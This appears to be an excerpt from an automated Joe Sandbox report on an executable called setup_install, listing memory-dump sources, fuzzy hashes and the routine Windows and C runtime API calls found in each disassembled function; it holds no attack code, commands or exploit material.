                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @
                                        • API String ID: 0-2766056989
                                        • Opcode ID: 265fee3adc4fb8debe1673d85d789cd1a6748779c2f9a7b708e4cf1f64a6f010
                                        • Instruction ID: 8d7897311d65d9350a495fca5f6ee5195a158cf46b70a449af6fee7f981d32cd
                                        • Opcode Fuzzy Hash: 265fee3adc4fb8debe1673d85d789cd1a6748779c2f9a7b708e4cf1f64a6f010
                                        • Instruction Fuzzy Hash: A741E5729083415FDB359E2984807A7BBA1AF81318F18847EDD816BBD1C339DC4AC789
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 72cb5ba446833af3eaadcca9dafd1fdcc63a6d46fa9728211d569cbc7fa17c28
                                        • Instruction ID: 00ed09e5a337d481d5ae919d8981c46beda42d4d7fa50a5c16f84db94f78ee9f
                                        • Opcode Fuzzy Hash: 72cb5ba446833af3eaadcca9dafd1fdcc63a6d46fa9728211d569cbc7fa17c28
                                        • Instruction Fuzzy Hash: 46F0FC719152004AEB70AF59A4843B377A0AB4632CF0448BBDA441B297D23DCC898B8E
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: strlen
                                        • String ID:
                                        • API String ID: 39653677-0
                                        • Opcode ID: 8d33c236e32c765190b7e4ad8361ef50fb01626d53bb75ed14065f70911ebaac
                                        • Instruction ID: e70548041981f1456dec0f81a701b5000e8c9aa41b6f36bd593b82a7aa84c78f
                                        • Opcode Fuzzy Hash: 8d33c236e32c765190b7e4ad8361ef50fb01626d53bb75ed14065f70911ebaac
                                        • Instruction Fuzzy Hash: 9811C372A193008BD734DE69D88166AB3E4EFC5304F108D3FE948A3781D779C8498B9A
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: malloc
                                        • String ID: <sI
                                        • API String ID: 2803490479-3642889959
                                        • Opcode ID: a7624a5f8bd310a61f588081697e8fada8fea75ffa567edbc5cb5e5221356bcc
                                        • Instruction ID: 7a9debeec0b5186d5d3726e38c7d0303cd2f8b5d174b8da82a2da4ed3841b454
                                        • Opcode Fuzzy Hash: a7624a5f8bd310a61f588081697e8fada8fea75ffa567edbc5cb5e5221356bcc
                                        • Instruction Fuzzy Hash: 0F1249706087068FC714CF19C48069AB7E1BF88354F158A2EF89997351D7B8EDC5CB8A
                                        APIs
                                        • abort.MSVCRT(?,?,474E5543,?,00493700,?,?,?,?,?,?,00496D2F,?,?,?,?), ref: 00497CA8
                                        • abort.MSVCRT(?,?,474E5543,?,00493700,?,?,?,?,?,?,00496D2F,?,?,?,?), ref: 00497CB5
                                        • fwrite.MSVCRT ref: 00497D13
                                        • fputs.MSVCRT ref: 00497D28
                                        • fputc.MSVCRT ref: 00497D41
                                        • abort.MSVCRT ref: 00497D4B
                                        • free.MSVCRT ref: 00497D53
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort$fputcfputsfreefwrite
                                        • String ID:
                                        • API String ID: 3364258748-0
                                        • Opcode ID: 429a767819aef2c6f0d05f6cd234bc4ca3c19398030845bbb839102e4c33c7e3
                                        • Instruction ID: 7d373c2e629130ab408fb27a1d864f45dcc40bdf494651f3e0ed403c85bb1a8b
                                        • Opcode Fuzzy Hash: 429a767819aef2c6f0d05f6cd234bc4ca3c19398030845bbb839102e4c33c7e3
                                        • Instruction Fuzzy Hash: 8A11AFB19187108BDB007FB6C44626DBEE5EF45348F02492FF1C957242DB7D44809BAB
                                        APIs
                                        • abort.MSVCRT(0040FCCB), ref: 00499654
                                        • abort.MSVCRT(0040FCCB), ref: 00499659
                                        • abort.MSVCRT(0040FCCB), ref: 0049965E
                                        • abort.MSVCRT(0040FCCB), ref: 00499663
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499668
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499670
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499675
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort
                                        • String ID:
                                        • API String ID: 4206212132-0
                                        • Opcode ID: 94ae119d985e34916c74491cb9474e9f4dd477538edefa849fc86b687acadb10
                                        • Instruction ID: bbd90c9b371175910635ffd915dfb9acc1b36f51aea892c87def14e0376ba845
                                        • Opcode Fuzzy Hash: 94ae119d985e34916c74491cb9474e9f4dd477538edefa849fc86b687acadb10
                                        • Instruction Fuzzy Hash: 0EF05CB2E0C2850BD710EB1484C03757BA09B57308F5814BEE554272C3C32D9C9DC75E
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleLibraryLoadModule
                                        • String ID: ) J
                                        • API String ID: 384173800-3411028049
                                        • Opcode ID: 4d8aea1281172d6ac20df9085a7e26ee08c63b5b46cae6bf9980fc81f5e6a1db
                                        • Instruction ID: 3fed9d0f1c7bf81fe5ab1e5f575db8d1326146ef2d7c0b2fe84701984dea96ec
                                        • Opcode Fuzzy Hash: 4d8aea1281172d6ac20df9085a7e26ee08c63b5b46cae6bf9980fc81f5e6a1db
                                        • Instruction Fuzzy Hash: 86019EB080D2409BC7007F78AE4815EBFF4AB81354F01857FDA899B261D7B89448DB9F
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: strlen
                                        • String ID: _$_GLOBAL_
                                        • API String ID: 39653677-1011282467
                                        • Opcode ID: 06dec30001edc313ee72c070c175a92cd6aa656eae1ead41d93f5ce08b88c2d5
                                        • Instruction ID: 1c21f5c12bb7b9c443c405340bd43c07b5322c77d87cfee6159719ff0277676c
                                        • Opcode Fuzzy Hash: 06dec30001edc313ee72c070c175a92cd6aa656eae1ead41d93f5ce08b88c2d5
                                        • Instruction Fuzzy Hash: 11E19471D04219CFDB21CF65C8D03DEBBB2BB45304F1481AAD448AB386D7799A89DF84
                                        APIs
                                        • GetSystemTimeAsFileTime.KERNEL32 ref: 0040CA99
                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004014B2), ref: 0040CAAA
                                        • GetCurrentThreadId.KERNEL32 ref: 0040CAB2
                                        • GetTickCount.KERNEL32 ref: 0040CABA
                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004014B2), ref: 0040CAC9
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                        • String ID:
                                        • API String ID: 1445889803-0
                                        • Opcode ID: ea255ef42ab34548d890da4657654e4d872ea1eefed088238d0d1a24c5476825
                                        • Instruction ID: e5cd12f676e70e0bdf5f5ecd3a7c6037ad8a51af51339fc5186449f9903646a8
                                        • Opcode Fuzzy Hash: ea255ef42ab34548d890da4657654e4d872ea1eefed088238d0d1a24c5476825
                                        • Instruction Fuzzy Hash: C91191B5A093418FC700DF79F88864BBBE0FB88254F04493AE548C6720EB34D8488B86
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32 ref: 0040CB5F
                                        • UnhandledExceptionFilter.KERNEL32 ref: 0040CB6F
                                        • GetCurrentProcess.KERNEL32 ref: 0040CB78
                                        • TerminateProcess.KERNEL32 ref: 0040CB89
                                        • abort.MSVCRT ref: 0040CB92
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
                                        • String ID:
                                        • API String ID: 520269711-0
                                        • Opcode ID: 676d1801a4014d2bbd9d98e6f58b6f98d6a6eb1b696a01aa118196d3deb0030c
                                        • Instruction ID: 58e36196525d6f67f627e84375eda0c61e00c2e6997dec50267deacc97ab9caf
                                        • Opcode Fuzzy Hash: 676d1801a4014d2bbd9d98e6f58b6f98d6a6eb1b696a01aa118196d3deb0030c
                                        • Instruction Fuzzy Hash: FD112BB5908384CFC700EF69E98560ABBF0FB48314F40853DE9489B362E7749954CF5A
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32 ref: 0040CB5F
                                        • UnhandledExceptionFilter.KERNEL32 ref: 0040CB6F
                                        • GetCurrentProcess.KERNEL32 ref: 0040CB78
                                        • TerminateProcess.KERNEL32 ref: 0040CB89
                                        • abort.MSVCRT ref: 0040CB92
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
                                        • String ID:
                                        • API String ID: 520269711-0
                                        • Opcode ID: 5017205182723c366eb1eac80e389436671045b72ca7f22568de259b031e7eb2
                                        • Instruction ID: 7819bb01281ab8ceca9f86d0aefc0d3c8f1b0872c91f45026377f3254fb2e397
                                        • Opcode Fuzzy Hash: 5017205182723c366eb1eac80e389436671045b72ca7f22568de259b031e7eb2
                                        • Instruction Fuzzy Hash: BA1139B5804284CFC700EF79E988609BBF0FB04304F00853DE9489B322E774A8448F4A
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32 ref: 6494873F
                                        • UnhandledExceptionFilter.KERNEL32 ref: 6494874F
                                        • GetCurrentProcess.KERNEL32 ref: 64948758
                                        • TerminateProcess.KERNEL32 ref: 64948769
                                        • abort.MSVCRT ref: 64948772
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
                                        • String ID:
                                        • API String ID: 520269711-0
                                        • Opcode ID: e842bc28190717a084615decf3955cde83ac10e752745b63f0a27ed88b8db6ef
                                        • Instruction ID: 1f5bfd3378f92f67a48eae871100b48ddf9832a157b0d9aed82ff39c4463e40d
                                        • Opcode Fuzzy Hash: e842bc28190717a084615decf3955cde83ac10e752745b63f0a27ed88b8db6ef
                                        • Instruction Fuzzy Hash: 5701D6B488C204CFCB48EFB9E1496497FF4FB0B304F208919E98987604E7749854CF82
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32 ref: 6494873F
                                        • UnhandledExceptionFilter.KERNEL32 ref: 6494874F
                                        • GetCurrentProcess.KERNEL32 ref: 64948758
                                        • TerminateProcess.KERNEL32 ref: 64948769
                                        • abort.MSVCRT ref: 64948772
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
                                        • String ID:
                                        • API String ID: 520269711-0
                                        • Opcode ID: 81c3fbf99bfd28983b65f1b5cac83f9631f8b32b19c2cf05882043377a15f7bb
                                        • Instruction ID: 5c9d36b0598bee5da53e0a0a82204d0e26b63caea97744da44e8bcd7d81ac210
                                        • Opcode Fuzzy Hash: 81c3fbf99bfd28983b65f1b5cac83f9631f8b32b19c2cf05882043377a15f7bb
                                        • Instruction Fuzzy Hash: D00196B488D205CFDB48EFA9E1496497FF4FB4B304F208519D98987605E7749454CF42
                                        APIs
                                          • Part of subcall function 00421B10: strlen.MSVCRT ref: 00421B23
                                          • Part of subcall function 00421B10: memcmp.MSVCRT ref: 00421B40
                                        • strtoul.MSVCRT ref: 00475088
                                        • fopen.MSVCRT ref: 00475125
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: fopenmemcmpstrlenstrtoul
                                        • String ID: /dev/urandom$Genu
                                        • API String ID: 316402028-2973575615
                                        • Opcode ID: 0621d6ca1c4bf91220a2b8e1ae0e1b5acdecd5a374ec607d326dea43cc5bbf5d
                                        • Instruction ID: 8fd9e74def58d37052e39669da2c5fc17705809dc7d9e3f4f3ac3b3d72e15860
                                        • Opcode Fuzzy Hash: 0621d6ca1c4bf91220a2b8e1ae0e1b5acdecd5a374ec607d326dea43cc5bbf5d
                                        • Instruction Fuzzy Hash: 0C4137B1B082004BDB14AE29998139BBBE5EB91350F44C83FD8849B346E7BC9845C79A
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: memcmp$strlen
                                        • String ID:
                                        • API String ID: 3738950036-0
                                        • Opcode ID: 09b81b29422037d900b845f18c3c347610b7133e01e680226d489e823d086a88
                                        • Instruction ID: 589bc552d28d626886c4cbf395fa4dd5349cdff293b2e784b317e730e64ce9da
                                        • Opcode Fuzzy Hash: 09b81b29422037d900b845f18c3c347610b7133e01e680226d489e823d086a88
                                        • Instruction Fuzzy Hash: D7612875A093119F8310AF2ADAC441FFBE5EFD9794F54892EF48887320D379D8409B9A
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: memcmp$strlen
                                        • String ID:
                                        • API String ID: 3738950036-0
                                        • Opcode ID: 574539aee8286ed26b650532bbbc850eee6d01a42f32ac8fbcb5490ef2d89c3a
                                        • Instruction ID: 42b10324800706e85ef3f621dc64781445fd94d421cc5c9a3b9878cbe4e9b263
                                        • Opcode Fuzzy Hash: 574539aee8286ed26b650532bbbc850eee6d01a42f32ac8fbcb5490ef2d89c3a
                                        • Instruction Fuzzy Hash: FF612771609311AF8300AF29DA8440BBBE1AFD9748F54C92EF98887315E375DC958B9A
                                        APIs
                                          • Part of subcall function 0040F4A0: pthread_once.LIBWINPTHREAD-1 ref: 0040F4EE
                                        • abort.MSVCRT(0040FCCB), ref: 00499663
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499668
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499670
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499675
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
